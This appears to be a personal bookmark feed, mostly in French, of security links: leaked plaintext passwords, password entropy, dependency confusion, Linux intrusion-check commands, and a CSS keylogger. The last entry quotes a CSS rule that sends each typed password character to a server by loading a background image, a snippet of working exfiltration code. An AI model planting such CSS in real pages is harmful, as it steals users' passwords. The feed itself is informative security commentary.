le mot de passe limité, ça m'a tué. Je comprends tout à fait le problème.

https://lehollandaisvolant.net/?id=20210301063758 recommande ING Direct. À voir

Le classique "les mots de passes était en clair" 💥

Avec de bonnes données personnelles bien valides 😞

C'est vrai que la liste est énorme ! 😱
(via Le Warrior du dimanche)

Publishing private packages as public ones to get the code executed !

Wow ! I might read this in the future. Seems interesting and full of knowledge !
(via https://sebsauvage.net/links/?xdvSfw)

A password with 256 bits of entropy is practically immune to brute-force attacks large enough to quite literally burn the world, but is quite trivial to crack with a universe-scale fuel source.

A password with 327 bits of entropy is nearly impossible to crack even if you burn the whole observable universe trying to do so.

Kids have cracked the login screen by bypassing the password with a coredump by typing like crazy on the virtual and physical keyboards 🤣

Il y a des gens pour créer des ceintures de chastetés connectées.
Et d'autres pour les pirater !

Une faille de sécurité découverte en cliquant sur le bouton "Se connecter avec Google". Elle permet d'y voler le token maître avec un tour de passe-passe, et donc d'avoir accès à toutes les informations du compte Google en question... 😱

Pour se faire une liste des mots pour des attaques de mots de passes par dictionnaires : récupérer les mots de Wikipedia

An exploit explained

w & who pour savoir qui est connecté,
last & lastb pour savoir qui a été connecté,
history (lancé depuis l'utilisateur à vérifier : su username) pour voir les traces laissées,
less /etc/passwd et cat /etc/passwd pour vérifier si on n'a pas créé un utilisateur à l'arrache,
ps et top pour vérifier s'il n'y a pas un processus malveillant,
ss & netstat pour vérifier les faiblesses réseau,
ip
crontab pour vérifier si une tâche cron n'est pas lancée régulièrement
find / -mtime -5 -ctime -5 pour vérifier les fichiers modifiés récemment,
cat /var/log/syslog, cat /var/log/syslog | less, tail -f -n 5 /var/log/syslog, cat /var/log/syslog | grep fail, tail -f /var/log/syslog pour les logs
Via https://shaarli.sebw.info/?aU81yg

(du hollandais volant)

TL;DR the low cost pentests are low cost because they only run automated tools; and they did not report vulnerabilities correctly.

An example with the JS code that copy/pasting from the shell commands from the web is a dangerous action

An example of live DDOS

Malin ! Un keylogger en CSS !

En fait un script génère pour tous les caractères ASCII, l'instruction CSS suivante :

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

Qui signifie que pour les champs de type password dont la valeur se termine par a, on va effectuer une requête externe vers un serveur avec la lettre a. On fait ça pour tous les caractères et hop on a le mot de passe.

(via https://links.hoa.ro/shaare/689gzA, via https://bookmarks.ecyseo.net/?cymp8g)